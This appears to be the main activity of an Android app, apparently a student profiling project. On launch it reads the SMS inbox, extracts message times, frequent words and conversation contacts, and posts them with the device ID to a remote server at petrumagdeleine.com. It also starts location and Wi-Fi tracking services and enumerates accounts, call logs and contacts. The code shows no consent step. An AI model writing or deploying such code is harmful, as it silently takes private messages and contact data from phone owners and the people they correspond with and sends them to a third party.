package com.pfe.www;

import android.provider.Settings;
import android.support.v7.app.ActionBarActivity;
import android.support.v4.app.Fragment;
import android.accounts.Account;
import android.accounts.AccountManager;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.net.Uri;
import android.os.Bundle;
import android.provider.CallLog;
import android.provider.ContactsContract;
import android.view.LayoutInflater;
import android.view.Menu;
import android.view.MenuItem;
import android.view.View;
import android.view.ViewGroup;

public class Main extends ActionBarActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main_layout);

        if (savedInstanceState == null) {
            getSupportFragmentManager().beginTransaction()
                    .add(R.id.container, new PlaceholderFragment())
                    .commit();
        }
        
        //**********************//
        // 	    GlobalClass   	//
        //**********************//

        final GlobalClass globalVariable = (GlobalClass)getApplicationContext();
        JSONFactory jf = globalVariable.getJsonFactory();
        globalVariable.setAndroidId(Settings.Secure.getString(getApplicationContext().getContentResolver(), Settings.Secure.ANDROID_ID));
        String androidId = globalVariable.getAndroidId();
        globalVariable.setJsonObject(jf.makeProfileJSON(androidId));

        ContentResolver cr = getContentResolver();
        Sender sender;

        //**********************//
        //       SMS hours      //
        //**********************//

        Uri inboxURI = Uri.parse("content://sms/inbox");
        String [] reqCols = new String [] { "_id", "address", "person", "date", "body" };
        Cursor c = cr.query(inboxURI, reqCols, null, null, null);
        c.moveToFirst();

        String[] smsList = new String[c.getCount()];
        for (int i = 0; i < c.getCount(); i++) {
            SMS sms = new SMS(c.getString(3));
            smsList[i] = sms.getHour();
            c.moveToNext();
        }
        sender = new Sender("http://petrumagdeleine.com/rest/addSMSList", jf.makeSmsListJSON(smsList, androidId));
        sender.post();

        //**********************//
        // 		 SMS words	 	//
        //**********************//

        String str;
        SMSWordsCounter sms_wc = new SMSWordsCounter();

        c.moveToFirst();
        for (int i = 0; i < c.getCount(); i++) {
            str = c.getString(4);
            sms_wc.parseText(str);
            c.moveToNext();
        }

        sender = new Sender("http://petrumagdeleine.com/rest/addWords", jf.makeWordsJSON(sms_wc.getBestWordsByNumberWords(25), androidId));
        sender.post();

        //**********************//
        //        Contact       //
        //**********************//

        SMSProvider sp = new SMSProvider(cr);
        sender = new Sender("http://petrumagdeleine.com/rest/addContacts", jf.makeContactsJSON(sp.getConversations(), androidId));
        sender.post();
		
        //**********************//
        // 	     Location   	//
        //**********************//
        
        startService(new Intent(Main.this, LocationService.class));
		
        //**********************//
        //    WIFI Detection    //
        //**********************//
        
        startService(new Intent(Main.this, WifiDeviceService.class));

        Intent intent = new Intent(Main.this, ProfileView.class);
		startActivity(intent);



        // NON USED DATA //

        //**********************//
        // 	  Account name  	//
        //**********************//

        Account[] accounts = AccountManager.get(this).getAccounts();

        System.out.println( "Accounts count : " + accounts.length);
        for (int i = 0; i < accounts.length; i++) {
            System.out.println( "Account name : " + accounts[i].name +" / " + accounts[i].type);
        }

        //**********************//
        // 	  Network info  	//
        //**********************//

        // Get Connectivity Manager class object from Systems Service
        ConnectivityManager cm = (ConnectivityManager) getSystemService(Context.CONNECTIVITY_SERVICE);

        // Get Network Info from connectivity manager
        NetworkInfo networkInfo = cm.getActiveNetworkInfo();

        // Check if network and isConnected
        if(networkInfo != null && networkInfo.isConnected()){
            System.out.println("Network type : " + networkInfo.getTypeName());
            System.out.println("Network info : " + networkInfo.toString());
        } else {
            System.out.println("No Network connection ! ");
        }

        //**********************//
        // 	  Call History  	//
        //**********************//

        String [] reqCols1 = new String [] {
                CallLog.Calls.NUMBER,
                CallLog.Calls.TYPE,
                CallLog.Calls.DATE,
                CallLog.Calls.DURATION
        };

        Cursor c1 = cr.query(CallLog.Calls.CONTENT_URI, reqCols1, null, null, null);
        System.out.println("Calls count : " + c1.getCount());

        //**********************//
        // 	  Profile data  	//
        //**********************//

        String [] reqCols2 = new String [] {
                ContactsContract.Profile._ID,
                ContactsContract.Profile.DISPLAY_NAME,
                ContactsContract.Profile.IS_USER_PROFILE
        };

        Cursor c2 = cr.query(ContactsContract.Profile.CONTENT_URI, reqCols2, null, null, null);
        System.out.println("Profiles count : " + c2.getCount());

        //**********************//
        // 	  Contact data  	//
        //**********************//

         // List required data
        String [] reqCols3 = new String [] {
                ContactsContract.Contacts._ID,
                ContactsContract.Contacts.DISPLAY_NAME,
                ContactsContract.Contacts.LAST_TIME_CONTACTED,
                ContactsContract.Contacts.TIMES_CONTACTED
        };

        // Read Contacts
        Cursor c3 = cr.query(ContactsContract.Contacts.CONTENT_URI, reqCols3, null, null, null);
        System.out.println("Contacts count : " + c3.getCount());
    }    		

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        
        // Inflate the menu; this adds items to the action bar if it is present.
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }

    @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        // Handle action bar item clicks here. The action bar will
        // automatically handle clicks on the Home/Up button, so long
        // as you specify a parent activity in AndroidManifest.xml.
        int id = item.getItemId();
        if (id == R.id.action_settings) {
            return true;
        }
        return super.onOptionsItemSelected(item);
    }

    /**
     * A placeholder fragment containing a simple view.
     */
    public static class PlaceholderFragment extends Fragment {

        public PlaceholderFragment() {
        }

        @Override
        public View onCreateView(LayoutInflater inflater, ViewGroup container,
                Bundle savedInstanceState) {
            View rootView = inflater.inflate(R.layout.main_fragment, container, false);
            return rootView;
        }
    }
}
